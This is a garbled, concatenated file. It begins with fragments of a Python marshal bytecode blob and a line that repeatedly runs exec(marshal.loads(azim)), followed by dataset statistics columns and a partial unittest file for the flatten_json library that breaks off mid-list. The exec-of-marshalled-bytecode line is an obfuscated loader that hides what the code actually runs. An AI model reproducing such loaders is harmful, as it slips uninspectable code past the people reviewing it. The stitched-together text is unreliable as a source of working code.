\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00'));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim))
| 24,619.666667
| 147,699
| 0.75043
| 33,217
| 147,718
| 3.332541
| 0.058765
| 0.276701
| 0.217486
| 0.196536
| 0.777167
| 0.740282
| 0.701546
| 0.659629
| 0.632312
| 0.604605
| 0
| 0.374549
| 0.007873
| 147,718
| 5
| 147,700
| 29,543.6
| 0.380779
| 0
| 0
| 0
| 0
| 8.5
| 0.736303
| 0.566273
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 18
|
291393ac2557d8b14f073d84f9f9386f89073587
| 68,470
|
py
|
Python
|
test_flatten.py
|
kanelee7512/flatten
|
7f434c4d17061bf0e5fcba6ed27dc7604afcf1ee
|
[
"MIT"
] | null | null | null |
test_flatten.py
|
kanelee7512/flatten
|
7f434c4d17061bf0e5fcba6ed27dc7604afcf1ee
|
[
"MIT"
] | null | null | null |
test_flatten.py
|
kanelee7512/flatten
|
7f434c4d17061bf0e5fcba6ed27dc7604afcf1ee
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import unittest
from flatten_json import (check_if_numbers_are_consecutive, cli, flatten,
flatten_preserve_lists, unflatten, unflatten_list)
try:
# python2
from StringIO import StringIO
except ImportError:
# python3
from io import StringIO
class UnitTests(unittest.TestCase):
def test_numbers_consecutive(self):
"""Checks if all numbers in a list are consecutive integers"""
list_ = [1, 2, 3, 4, 5]
actual = check_if_numbers_are_consecutive(list_)
self.assertTrue(actual)
list_ = [0, 1, 5]
actual = check_if_numbers_are_consecutive(list_)
self.assertFalse(actual)
list_ = [1.0, 2.0, 3.0]
actual = check_if_numbers_are_consecutive(list_)
self.assertTrue(actual)
list_ = range(10)
actual = check_if_numbers_are_consecutive(list_)
self.assertTrue(actual)
list_ = range(10, 0, -1)
actual = check_if_numbers_are_consecutive(list_)
self.assertFalse(actual)
def test_empty(self):
d = {}
expected = d
actual = flatten(d)
self.assertEqual(expected, actual)
def test_no_flatten(self):
dic = {'a': '1', 'b': '2', 'c': 3}
expected = dic
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_one_flatten(self):
dic = {'a': '1',
'b': '2',
'c': {'c1': '3', 'c2': '4'}
}
expected = {'a': '1', 'b': '2', 'c_c1': '3', 'c_c2': '4'}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_one_flatten_utf8(self):
dic = {'a': '1',
u'ñ': u'áéö',
'c': {u'c1': '3', 'c2': '4'}
}
expected = {'a': '1', u'ñ': u'áéö', 'c_c1': '3', 'c_c2': '4'}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_one_flatten_utf8_dif(self):
a = {u'eñe': 1}
info = dict(info=a)
expected = {u'info_{}'.format(u'eñe'): 1}
actual = flatten(info)
self.assertEqual(expected, actual)
def test_custom_separator(self):
dic = {'a': '1',
'b': '2',
'c': {'c1': '3', 'c2': '4'}
}
expected = {'a': '1', 'b': '2', 'c*c1': '3', 'c*c2': '4'}
actual = flatten(dic, '*')
self.assertEqual(expected, actual)
def test_list(self):
dic = {
'a': 1,
'b': [{'c': [2, 3]}]
}
expected = {'a': 1, 'b_0_c_0': 2, 'b_0_c_1': 3}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_list_and_dict(self):
dic = {
'a': 1,
'b': 2,
'c': [{'d': [2, 3, 4], 'e': [{'f': 1, 'g': 2}]}]
}
expected = {'a': 1, 'b': 2, 'c_0_d_0': 2, 'c_0_d_1': 3, 'c_0_d_2': 4,
'c_0_e_0_f': 1, 'c_0_e_0_g': 2}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_empty_list_and_dict(self):
dic = {
'a': {},
'b': [],
'c': '',
'd': None,
'e': [{'f': [], 'g': [{'h': {}, 'i': [], 'j': '', 'k': None}]}]
}
expected = {'a': {}, 'b': [], 'c': '', 'd': None,
'e_0_f': [], 'e_0_g_0_h': {}, 'e_0_g_0_i': [],
'e_0_g_0_j': '', 'e_0_g_0_k': None}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_tuple(self):
dic = {
'a': 1,
'b': ({'c': (2, 3)},)
}
expected = {'a': 1, 'b_0_c_0': 2, 'b_0_c_1': 3}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_empty_tuple(self):
dic = {
'a': 1,
'b': ({'c': ()},)
}
expected = {'a': 1, 'b_0_c': ()}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_blog_example(self):
dic = {
"a": 1,
"b": 2,
"c": [{"d": ['2', 3, 4], "e": [{"f": 1, "g": 2}]}]
}
expected = {'a': 1, 'b': 2, 'c_0_d_0': '2', 'c_0_d_1': 3,
'c_0_d_2': 4, 'c_0_e_0_f': 1,
'c_0_e_0_g': 2}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_unflatten_no_list(self):
dic = {
'a': 1,
'b_a': 2,
'b_b': 3,
'c_a_b': 5
}
expected = {
'a': 1,
'b': {'a': 2, 'b': 3},
'c': {'a': {'b': 5}}
}
actual = unflatten(dic)
self.assertEqual(expected, actual)
def test_unflatten_with_list(self):
"""Dictionary with lists"""
dic = {
'a': 1,
'b_0': 1,
'b_1': 2,
'c_a': 'a',
'c_b_0': 1,
'c_b_1': 2,
'c_b_2': 3
}
expected = {
'a': 1,
'b': [1, 2],
'c': {'a': 'a', 'b': [1, 2, 3]}
}
actual = unflatten_list(dic)
self.assertEqual(expected, actual)
dic = {'a': 1, 'b_0': 5}
expected = {'a': 1, 'b': [5]}
actual = unflatten_list(dic)
self.assertEqual(expected, actual)
dic = {'a': 1, 'b:0': 5}
expected = {'a': 1, 'b': [5]}
actual = unflatten_list(dic, ':')
self.assertEqual(expected, actual)
def test_unflatten_with_list_custom_separator(self):
"""Complex dictionary with lists"""
dic = {
'a:b': 'str0',
'c:0:d:0:e': 'str1',
'c:1:d:0:e': 'str4',
'c:1:f': 'str5',
'c:0:f': 'str2',
'c:1:g': 'str6',
'c:0:g': 'str3',
'h:d:0:e': 'str7',
'h:i:0:f': 'str8',
'h:i:0:g': 'str9'
}
expected = {
'a': {'b': 'str0'},
'c': [
{
'd': [{'e': 'str1'}],
'f': 'str2',
'g': 'str3'
}, {
'd': [{'e': 'str4'}],
'f': 'str5',
'g': 'str6'
}
],
'h': {
'd': [{'e': 'str7'}],
'i': [{'f': 'str8', 'g': 'str9'}]
}
}
actual = unflatten_list(dic, ':')
self.assertEqual(expected, actual)
def test_unflatten_with_list_nested(self):
dic = {"a": [[{"b": 1}], [{"d": 1}]]}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_unflatten_with_list_issue15(self):
"""https://github.com/amirziai/flatten/issues/15"""
dic = {"Required": {"a": "1",
"b": ["1", "2", "3"],
"c": {"d": {"e": [[{"s1": 1}, {"s2": 2}],
[{"s3": 1}, {"s4": 2}]]}},
"f": ["1", "2"]},
"Optional": {"x": "1", "y": ["1", "2", "3"]}}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_unflatten_with_list_issue31(self):
"""https://github.com/amirziai/flatten/issues/31"""
dic = {"testdict": {"seconddict": [["firstvalue",
"secondvalue"],
["thirdvalue",
"fourthvalue"]]}}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_unflatten_with_df_issue40(self):
"""https://github.com/amirziai/flatten/issues/40"""
dic = {
'a.b': float('nan'),
'a.b.c': 2,
'a.b.d': 3,
'a.e': 4
}
expected = {
'a': {'b': {'c': 2, 'd': 3},
'e': 4
}
}
actual = unflatten(dic, '.')
self.assertEqual(expected, actual)
def test_unflatten_with_key_loss_issue51(self):
"""https://github.com/amirziai/flatten/issues/51"""
dic = {
'a': 1,
'a_b': 2,
'a_c.d': 3,
'a_c.e': 4
}
expected = {
'a': 1,
'a_b': 2,
'a_c': {'d': 3, 'e': 4}
}
actual = unflatten(dic, '.')
self.assertEqual(expected, actual)
def test_flatten_preserve_lists_issue43_nested(self):
"""https://github.com/amirziai/flatten/issues/43"""
dic = {
'a': {'a': ["x0", "x1", "x2"]},
'b': {'b': 'foo', 'c': 'bar'},
'c': {'c': [
{'foo': 2, 'bar': 6, 'baz':
["n1", "n2", "n3", "n1.1", "n2.2"]},
{'foo': 5, 'bar': 7, 'baz': ["n4", "n5", "n6"]},
{'foo': float('nan')},
{'foo': 100},
]},
'd': {'g': 10},
'f': {'h': 100, 'gar': [
{"gup": 200, "garp": [
{"gu": 300, "gat": ["f7", "f8"]},
{"gu": 800, "gat": ["f9", "f10", "f11"]}
]
}]}
}
actual = flatten_preserve_lists(dic, max_depth=100, max_list_index=30)
expected = [
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n1",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n2",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f11",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f7",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 300,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f8",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f9",
"c_c_foo": 2,
"d": 10},
{"a_a": "x0",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x1",
"f_h": 100,
"c_c": None,
"c_c_baz": "n3",
"b_b": "foo",
"b_c": "bar",
"f_gar_garp_gu": 800,
"f_gar_gup": 200,
"c_c_bar": 6,
"f_gar_garp_gat": "f10",
"c_c_foo": 2,
"d": 10},
{"a_a": "x2",
"f_h": 100,
